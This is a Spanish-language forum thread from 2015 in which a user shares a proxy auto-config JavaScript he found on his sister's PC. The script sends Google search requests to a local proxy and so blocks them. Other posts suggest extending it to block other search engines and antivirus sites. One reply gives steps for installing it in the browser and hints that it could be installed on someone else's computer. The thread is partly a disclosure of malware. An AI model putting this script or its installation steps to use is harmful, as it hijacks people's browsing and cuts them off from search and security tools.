Malware que no deja entrar en google

Iniciado por rollth, Marzo 09, 2015, 12:58:03 PM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Buenas a todos, hoy vengo a enseñaros un script en .js que no deja navegar por google.

Lo he descubierto en el pc de mi hermana ya que me dijo que se lo formatease, y ya de paso os lo enseño.

Código: javascript
function FindProxyForURL(url, host) {
    var strProxy = "PROXY 127.0.0.1:9064";
    var regExp = /^http(s)?:\/\/www\.google\..{2,6}\/search\?/;
    if (regExp.test(url)) {
        return strProxy;
    }
    return "DIRECT";
}


La cuestión es que si intentas hacer una búsqueda en google el script te lo bloquea redireccionandote a 127.0.0.1

Esto se pone en la configuración para que se inicie junto al navegador.

Bueno eso es todo.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


Muy buena rollth, seguro que ayuda a más de uno con el mismo problema, el que hizo el script, podría habérselo currado un poco más y haber añadido más urls (como bing, yahoo, y todas las de los antivirus).

Saludos.



Disculpa la ignorancia como instalo el scrip

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disculpa la ignorancia como instalo el scrip

Espero que te refieras con la url modificada xD y que sea para otra persona, porque si no quieres entrar en google desde tu pc simplemente no entres, es mas facil.

En cuanto a tu pregunta ese script lo tienes que poner en un archivo de texto y guardarlo como algo.js, luego tienes que entrar en la configuración de tu navegador y poner que se inicie el script junto al navegador, en internet explorer si no recuerdo mal era en opciones de internet > programas, busca por ahi, seguro que si buscas bien por internet encuentras la forma de automatizarlo.
RollthBuen hacker mejor No tienes permitido ver los links. Registrarse o Entrar a mi cuenta/No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disculpa la ignorancia como instalo el scrip

Espero que te refieras con la url modificada xD y que sea para otra persona, porque si no quieres entrar en google desde tu pc simplemente no entres, es mas facil.

En cuanto a tu pregunta ese script lo tienes que poner en un archivo de texto y guardarlo como algo.js, luego tienes que entrar en la configuración de tu navegador y poner que se inicie el script junto al navegador, en internet explorer si no recuerdo mal era en opciones de internet > programas, busca por ahi, seguro que si buscas bien por internet encuentras la forma de automatizarlo.

Gracias por responder, en Chrome y Firefox ?

Ah una duda se podria redireccionar su de un sitio web a otro?

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Disculpa la ignorancia como instalo el scrip

Espero que te refieras con la url modificada xD y que sea para otra persona, porque si no quieres entrar en google desde tu pc simplemente no entres, es mas facil.

En cuanto a tu pregunta ese script lo tienes que poner en un archivo de texto y guardarlo como algo.js, luego tienes que entrar en la configuración de tu navegador y poner que se inicie el script junto al navegador, en internet explorer si no recuerdo mal era en opciones de internet > programas, busca por ahi, seguro que si buscas bien por internet encuentras la forma de automatizarlo.

Gracias por responder, en Chrome y Firefox ?

Ah una duda se podria redireccionar su de un sitio web a otro?

Sí, de la misma manera, pero con otro script.

Saludos.